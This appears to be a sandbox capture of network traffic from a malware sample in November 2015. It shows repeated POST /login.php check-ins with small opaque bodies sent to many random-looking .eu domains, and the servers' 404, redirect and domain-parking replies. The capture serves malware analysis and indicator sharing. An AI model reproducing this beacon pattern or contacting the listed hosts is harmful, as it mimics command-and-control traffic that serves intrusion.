User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 286
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Fri, 20 Nov 2015 09:09:43 GMT..Server: Apache/2.4.7 (Ubuntu)..Content-Length: 286..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.4.7 (Ubuntu) Server at keraborigin.eu Port 80</address>.</body></html>...
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.rynyhipexon.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:41 GMT
Server: Apache
Set-Cookie: vsid=905vr1955561817007335; expires=Wed, 18-Nov-2020 09:09:41 GMT; path=/; domain=ww92.rynyhipexon.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XogFpIWeIpJr5PYCNL QDXuaD8wjub0G2TCf1f5AfmcIV/0YQtuvLTHzpln PfYWkIyXNLhB3uNWrDOfYM8xog==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.rynyhipexon.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.rynyhipexon.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.rynyhipexon.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.lykemujebeq.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:34 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.lykemujebeq.eu..Vary: Accept-Encoding..
GET /domain/jewuqyjywyv.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=71c55851e5901a95263b027885fa0411; domain=.jewuqyjywyv.eu
Location: hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411
3e..Go hXXp://xsso.jewuqyjywyv.eu/71c55851e5901a95263b027885fa0411..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/nojejecebuw.eu
Set-Cookie: btst=b36799928aa683da3e97e7666bae6fc8|194.242.96.218|1448010560|1448010560|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /domain/tucyguqaciq.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu
Location: hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424
3e..Go hXXp://xsso.tucyguqaciq.eu/d1e2832667be3ac8af2587e3c0958424..0..
GET /f89965e1c0417ff83998ff3762e77e38 HTTP/1.1
Host: xsso.ciliqikytec.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=f89965e1c0417ff83998ff3762e77e38; domain=.ciliqikytec.eu
19..Landed ciliqikytec.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.xuqufyduras.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>xuqufyduras.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'xuqufyduras.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU2NC42MDM4OjM1MDBjNzg2MmVhZjA4MDhjZjQ0ZjkzOGE4MmI0YjY1ODAyZDUzYjQxMGQ3MTBhNjUxZGU0M2Y2NjdiNmY0NjE6NTY0ZWUzNDQ5MzZlZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTM0NDhiMjY2fHx8MTQ0ODAxMDU2NC42MDk5fGZjYThkMGFmZTdhZTU3NWZkYmViYzZlNzRlNmJkNmQ4NTQxMmQ1MTV8fHx8fDF8fHwwfDU2NGVlMzQ0MTM1MzVmYjUzZThiNTA2M3x8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/ciliqikytec.eu
Set-Cookie: btst=429cf1fb2eaac1d730774bf27097da95|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.kevedorozup.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=918vr1955561445810499; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.kevedorozup.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=104
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pCSuho4Rz2cFO6ztB/gVCEwEzGaOY4/zxPU34OpnSoSTVObfw1vkuwKwAjb1u/rzaQ58oMADjyaRB1YttOPnbQ==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.kevedorozup.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.kevedorozup.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.kevedorozup.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digusebyvad.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:15 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.digusebyvad.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:15 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww62.digusebyvad.eu..Vary: Accept-Encoding..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.dimutobihom.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:00 GMT
Server: Apache
Set-Cookie: vsid=918vr1955561406202917; expires=Wed, 18-Nov-2020 09:09:00 GMT; path=/; domain=ww92.dimutobihom.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=116
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Mic7DvRpvetI juA8PXbn52KQPN AbsmtkknMs383riOTAcQmT9M10mpQJ6vSG50WzlfUtULM2gARrNlntDjZA==" >..<head>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>ww92.dimutobihom.eu</title>.. <style type="text/css">*{margin:0; padding:0; border: 0; overflow:hidden} html, body {height: 100%;}</style>..</head>..<body width="100%" height="100%">..<noscript><meta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" /><center><p style="padding:1em; font-size:1.5em;">For search results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=ww92.dimutobihom.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="text-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p></center></noscript>..<div id="rmgblock" width="100%" height="100%"></div>..<script type="text/javascript" src="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.dimutobihom.eu"></script>..<script type="text/javascript" language="JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>..<script type="text/javascript"> function collectHeight(){try{var e=Math.max(document.documen
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.nozulufynax.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:49 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>nozulufynax.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'nozulufynax.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU2NS42Njk3OjQxNzNkNDE0ZTc3YTdhZjMyZDBmY2Y1ODQxZjA4MjlhZjIyMjNkNTE2NzUyYjUzYmRhYTQ0MjJiNGM4MmM4ZWI6NTY0ZWUzNDVhMzg2MQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM0NTljY2U2fHx8MTQ0ODAxMDU2NS42NzQ2fGI2NDQ2N2RkZTVhMjJmNjdiZjYyYWMwZmNlYjM1OTU3ODdiOTBiMzV8fHx8fDF8fHwwfDU2NGVlMzQ1MTU1MzVmMDMyOThiNjNkYnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.norumikemem.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>norumikemem.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'norumikemem.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40NDU3Ojk4OTkwOGUwMWZmNTQxYTZlOTU2MjFhZDcwNTI2MzFlZjVhZDY3MmRkMWVhMjk5ODc1NjY5YzYxYzI2ZWVkY2Y6NTY0ZWUzMzA2Y2QyMQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDZiMjczfHx8MTQ0ODAxMDU0NC40NTI0fDNjMzU2MWFjNGM5NmZlYTAzNTljY2M3YjRiODJhNTk0NWU3ZjZmNDB8fHx8fDF8fHwwfDU2NGVlMzMwMTM1MzVmNzI0MjhiNGZhZXx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.lyvufixyvet.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:19:04 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>lyvufixyvet.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'lyvufixyvet.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU4MC41MzMxOmEzZmNhYWY4MGRlNmIyZGZjZjU4MjkwZWY2OWNiY2U2Y2IwYThmNTFkYzdiOTQxYzE2ZGI5NmY4YzY5Nzk4ZmI6NTY0ZWUzNTQ4MjI4Nw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0N3x8fHw1NjRlZTM1NDgxMWQzfHx8MTQ0ODAxMDU4MC41Mzh8YTRlZWY3YmVhYjlkNjk3YmFmNWI0MzhlYzM2YTRiNWYxMDkxMDU4NHx8fHx8MXx8fDB8NTY0ZWUzNTQ4OGZiY2UxYWFmOGI0OWE0fHx8MHx8fHx8fDB8fHx8fHx8fHw=';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvufixyvet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:10 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.lyvufixyvet.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:22:10 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.lyvufixyvet.eu..Vary: Accept-Encoding..
GET /zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525 HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ze1.zeroredirect1.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'
X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 20 Nov 2015 09:08:59 GMT
Server: ZeroPark-Traffic
3ed..<!DOCTYPE html>.<html>..<head>...<META http-equiv="refresh" content="1;URL='hXXp://ze1.zeroredirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=meta'">..</head>..<body>...<script type="text/javascript">....setTimeout(function () {.....var pageWidth = window.innerWidth ? window.innerWidth : (document.documentElement && document.documentElement.clientWidth ? document.documentElement.clientWidth : document.getElementsByTagName('body')[0].clientWidth);.....var pageHeight = window.innerHeight ? window.innerHeight : (document.documentElement && document.documentElement.clientHeight ? document.documentElement.clientHeight : document.getElementsByTagName('body')[0].clientHeight);.....var iframeDetected = window.self !== window.top;.....window.location="hXXp://ze1.zeroredirect2.com/zcredirect?visitid=56383af2-8f66-11e5-9f3b-06d3db30a525&type=js&browserWidth=" pageWidth "&browserHeight=" pageHeight "&iframeDetected=" iframeDetected;....}, 1);...</script>..</body>.</html>..0..HTTP/1.1 200 OK..Cache-Control: no-store, no-cache, pre-check=0, post-check=0..content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'..x-content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'..X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline'..Content-Type: text/html;charset=UTF-8..Transfer-Encoding: chunked..Date: Fri, 20 Nov 2015 09:08:59 GMT..Server: ZeroPark-Traffic..3ed..<!DOCTYPE htm
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nozulufynax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:52 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.nozulufynax.eu
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:52 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.nozulufynax.eu..Vary: Accept-Encoding......
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
